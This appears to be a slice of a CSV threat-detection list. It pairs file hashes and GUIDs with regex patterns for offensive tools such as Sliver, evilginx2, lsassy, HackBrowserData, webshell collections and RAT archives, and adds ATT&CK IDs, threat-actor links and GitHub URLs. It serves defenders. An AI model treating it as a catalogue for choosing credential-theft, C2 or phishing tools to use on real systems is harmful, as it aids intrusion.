"*d9b1338f0cd7c0166a66b809e6c0519efbc37ad5b6a318454daa6f71693ba910*",".{0,1000}d9b1338f0cd7c0166a66b809e6c0519efbc37ad5b6a318454daa6f71693ba910.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","40025"
"*d9b2ed1ac7727c0ca511742ff66c52de2adc1f8af1cf9751c9c3153233121ad7*",".{0,1000}d9b2ed1ac7727c0ca511742ff66c52de2adc1f8af1cf9751c9c3153233121ad7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40026"
"*d9b41241dd303f1ab21a96e85254e237e3fe95e9a325ccc1c87bf2dafe066427*",".{0,1000}d9b41241dd303f1ab21a96e85254e237e3fe95e9a325ccc1c87bf2dafe066427.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","40027"
"*d9b60cb1a10bd59a3cfa900e13ffd3592b214c9c22a9cf3812581ac845c3c594*",".{0,1000}d9b60cb1a10bd59a3cfa900e13ffd3592b214c9c22a9cf3812581ac845c3c594.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","40028"
"*d9b74200f9ac68b21bf978956eceaaf1ac34f96a47833928714b8f1857bccf2b*",".{0,1000}d9b74200f9ac68b21bf978956eceaaf1ac34f96a47833928714b8f1857bccf2b.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","40030"
"*d9b9491fbe838aa7d97c46ef81f42c9c9748aabec0697d9abde6ddd6b464c1eb*",".{0,1000}d9b9491fbe838aa7d97c46ef81f42c9c9748aabec0697d9abde6ddd6b464c1eb.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","40031"
"*d9c7dc1a5a792486cc3853620eb700e26a047238ba92c757b4f9d40605dbd3b8*",".{0,1000}d9c7dc1a5a792486cc3853620eb700e26a047238ba92c757b4f9d40605dbd3b8.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","40033"
"*d9c8a6fa2ba159dea9e2bbeb86f0d329f996bbf51ff326d194968c2153aabea5*",".{0,1000}d9c8a6fa2ba159dea9e2bbeb86f0d329f996bbf51ff326d194968c2153aabea5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40034"
"*d9ce9dfbdd4f95ad01fc05855235d6894ef878d6d02706e6c91720ee8a4fb5bf*",".{0,1000}d9ce9dfbdd4f95ad01fc05855235d6894ef878d6d02706e6c91720ee8a4fb5bf.{0,1000}","offensive_tool_keyword","CACTUSTORCH","A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it.","T1055.011 - T1059.005 - T1059.007","TA0002 - TA0005","N/A","APT32","Exploitation tool","https://github.com/mdsecactivebreach/CACTUSTORCH","1","0","#filehash","N/A","8","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","40035"
"*d9d30d28c1f342516cf9be162135f570ad63e591ce2a1a6056c96e525b635fbb*",".{0,1000}d9d30d28c1f342516cf9be162135f570ad63e591ce2a1a6056c96e525b635fbb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40036"
"*d9d5daaecd31c7616b01456da34cb3b51006b5a7697af4cadfa8167e7a8b6f81*",".{0,1000}d9d5daaecd31c7616b01456da34cb3b51006b5a7697af4cadfa8167e7a8b6f81.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","40037"
"*d9dd9d8ef1406c7ad002253fc6e65d035037267640f44338e9468e219f95bf3b*",".{0,1000}d9dd9d8ef1406c7ad002253fc6e65d035037267640f44338e9468e219f95bf3b.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#filehash","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","40039"
"*d9ddddcdbf8d02342414c807640f951c8c49e69f15d0f8a45fd0a8a606f5229c*",".{0,1000}d9ddddcdbf8d02342414c807640f951c8c49e69f15d0f8a45fd0a8a606f5229c.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","40040"
"*d9e138fbb6a18ba5a8f9405a45144f86211187609b158f862eba7a942360b3a1*",".{0,1000}d9e138fbb6a18ba5a8f9405a45144f86211187609b158f862eba7a942360b3a1.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","40041"
"*d9e58e0a47eacc9ccb42322516dcd21658aedb39e1dd64ff4af86e4fca648ddc*",".{0,1000}d9e58e0a47eacc9ccb42322516dcd21658aedb39e1dd64ff4af86e4fca648ddc.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","40042"
"*d9fb91ea8b177ea86eefc1a62a875e55136fa268aa762fa44a377023f89b7673*",".{0,1000}d9fb91ea8b177ea86eefc1a62a875e55136fa268aa762fa44a377023f89b7673.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","0","#filehash","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","40043"
"*d9fd35586f323c9990b3da5c7c1f07c05ff88bc7*",".{0,1000}d9fd35586f323c9990b3da5c7c1f07c05ff88bc7.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","40044"
"*DA06A931-7DCA-4149-853D-641B8FAA1AB9*",".{0,1000}DA06A931\-7DCA\-4149\-853D\-641B8FAA1AB9.{0,1000}","offensive_tool_keyword","TinyMet","meterpreter stager","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","CL0P - FIN7 - FIN11 - Silence group - GOLD EVERGREEN","C2","https://github.com/SherifEldeeb/TinyMet","1","0","#GUIDproject","N/A","10","10","128","43","2019-08-20T04:39:22Z","2014-05-17T13:31:55Z","40045"
"*DA0A017BDD91FE21E8580F8AC005B497743635E73649764D132726E341171D50*",".{0,1000}DA0A017BDD91FE21E8580F8AC005B497743635E73649764D132726E341171D50.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","40046"
"*da1198d8820ab8ff3a617970dbab3f1476c90a87f69a6deb98dbd02026f7e829*",".{0,1000}da1198d8820ab8ff3a617970dbab3f1476c90a87f69a6deb98dbd02026f7e829.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","40048"
"*da130b91b87ce2cc4e21f221d51f2ee1d9a3052a1d414b7028a78ebf2fd8168c*",".{0,1000}da130b91b87ce2cc4e21f221d51f2ee1d9a3052a1d414b7028a78ebf2fd8168c.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","40049"
"*DA1B7904-0DDC-45A0-875F-33BBA2236C44*",".{0,1000}DA1B7904\-0DDC\-45A0\-875F\-33BBA2236C44.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#GUIDproject","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","40051"
"*DA230B64-14EA-4D49-96E1-FA5EFED9010B*",".{0,1000}DA230B64\-14EA\-4D49\-96E1\-FA5EFED9010B.{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","#GUIDproject","N/A","9","2","188","38","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z","40052"
"*da23cfa752e49e813f9b47639456b433cbbdd0e4e50f4d0647c653ecce17ab97*",".{0,1000}da23cfa752e49e813f9b47639456b433cbbdd0e4e50f4d0647c653ecce17ab97.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","40053"
"*da2e2e4a0d34d63a452322f2fe5f57416aa79b6abb8a2a7cc3917a3b772d4cea*",".{0,1000}da2e2e4a0d34d63a452322f2fe5f57416aa79b6abb8a2a7cc3917a3b772d4cea.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","40054"
"*da343e48b3effaf3c6e6ce3916276d06c7406b8fd0641e7629b731c1fc03526f*",".{0,1000}da343e48b3effaf3c6e6ce3916276d06c7406b8fd0641e7629b731c1fc03526f.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","40055"
"*da34a400c7a113947f339714605130170e40ddc09a5663657e2370a0de3b0c4c*",".{0,1000}da34a400c7a113947f339714605130170e40ddc09a5663657e2370a0de3b0c4c.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","40056"
"*da39f93031e1ca0bd919e5a062b01d0bf39b52e88919ebae40a1379523ccab37*",".{0,1000}da39f93031e1ca0bd919e5a062b01d0bf39b52e88919ebae40a1379523ccab37.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40057"
"*da46e5b2a4a7fb855ec7ca2d53247ab30f87c4cae8b284f2e793c0f716848fe4*",".{0,1000}da46e5b2a4a7fb855ec7ca2d53247ab30f87c4cae8b284f2e793c0f716848fe4.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","#filehash","N/A","10","9","N/A","N/A","N/A","N/A","40059"
"*da584a49609de5985f5ba64cfb215f0c30c93fac11563ea32afa3820b3327139*",".{0,1000}da584a49609de5985f5ba64cfb215f0c30c93fac11563ea32afa3820b3327139.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","40060"
"*da5d6eca1efe3219fa8102a0afbf9823dc8b2c00dd53af20960ed29bca1b2cef*",".{0,1000}da5d6eca1efe3219fa8102a0afbf9823dc8b2c00dd53af20960ed29bca1b2cef.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","#filehash","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","40061"
"*da659d8c05cfcb5f0abe167191665359123643000d12140836c28d204294ceb6*",".{0,1000}da659d8c05cfcb5f0abe167191665359123643000d12140836c28d204294ceb6.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","40063"
"*da6a12b87a18f943d1dd3f50a9f80313302efad3ce750c4073343d55f3b94b72*",".{0,1000}da6a12b87a18f943d1dd3f50a9f80313302efad3ce750c4073343d55f3b94b72.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40064"
"*da6b27ef40704e6be3aed8b68a5d06482335e34e0a19bf34b900554e1d874726*",".{0,1000}da6b27ef40704e6be3aed8b68a5d06482335e34e0a19bf34b900554e1d874726.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","40065"
"*da6c929d77beb9a7cdb968a22a9e39343f27f0ac11672e11adaf3c773bd32c95*",".{0,1000}da6c929d77beb9a7cdb968a22a9e39343f27f0ac11672e11adaf3c773bd32c95.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","40066"
"*da7c5433975b488f5b5831b7b50ada9f84d720fa4593117685649d25ce408167*",".{0,1000}da7c5433975b488f5b5831b7b50ada9f84d720fa4593117685649d25ce408167.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","40067"
"*DA7DF89C-447D-4C2D-9C75-933037BF245E*",".{0,1000}DA7DF89C\-447D\-4C2D\-9C75\-933037BF245E.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","40068"
"*da817f811f9c4b3f118d78bffcccafd6f1a8cb21e505305f6ae45e1583982abc*",".{0,1000}da817f811f9c4b3f118d78bffcccafd6f1a8cb21e505305f6ae45e1583982abc.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","0","#filehash","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","40069"
"*da84dfd9b5b5f068189c1a37f2f3003c402ebf6bc1080e70caa82c51ee4c2bc8*",".{0,1000}da84dfd9b5b5f068189c1a37f2f3003c402ebf6bc1080e70caa82c51ee4c2bc8.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","0","#filehash","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","40070"
"*da8bf03ff487a649c28018f5e4d7bdac0e1ff1ed7ed67d6fa1b901c4dbc36a30*",".{0,1000}da8bf03ff487a649c28018f5e4d7bdac0e1ff1ed7ed67d6fa1b901c4dbc36a30.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","0","#filehash","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","40071"
"*da8ea1b2c9f697d582cbcf8ef9f61ecdfd4105643cc7da7b026c5333e4b6be58*",".{0,1000}da8ea1b2c9f697d582cbcf8ef9f61ecdfd4105643cc7da7b026c5333e4b6be58.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","#filehash","N/A","10","7","N/A","N/A","N/A","N/A","40072"
"*da9735d88a845e465aa4fe4968df15b97ba4b6565f150a48ead7a3ca7298df93*",".{0,1000}da9735d88a845e465aa4fe4968df15b97ba4b6565f150a48ead7a3ca7298df93.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","#filehash","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","40073"
"*da9ebc9ba59655b365203b0a48c54ec230ddc0a539bd5b3feccab19a0da5127a*",".{0,1000}da9ebc9ba59655b365203b0a48c54ec230ddc0a539bd5b3feccab19a0da5127a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","40074"
"*da9ed4d88d12f0938c05fad2fcfe69ba3fd90b0bda98844cc886e5103ac62c93*",".{0,1000}da9ed4d88d12f0938c05fad2fcfe69ba3fd90b0bda98844cc886e5103ac62c93.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40075"
"*daa2d41ddbb72ece740bda89d16858223e9549977a2f0bbaab9a48c994ebac27*",".{0,1000}daa2d41ddbb72ece740bda89d16858223e9549977a2f0bbaab9a48c994ebac27.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40076"
"*daa394aa061c03a9f3cc0378039e64aadd0a9d05344c8c7bc25cea9c7ace9049*",".{0,1000}daa394aa061c03a9f3cc0378039e64aadd0a9d05344c8c7bc25cea9c7ace9049.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","0","#filehash","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","40077"
"*daa60ab697e9a8cd8ec70c7cc31de5692de1c878c425514788229e791c746e6b*",".{0,1000}daa60ab697e9a8cd8ec70c7cc31de5692de1c878c425514788229e791c746e6b.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","40078"
"*dab858feab4506727059fda4645865e2029892c6560704a7077433bab5d5ca0e*",".{0,1000}dab858feab4506727059fda4645865e2029892c6560704a7077433bab5d5ca0e.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","0","#filehash","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","40081"
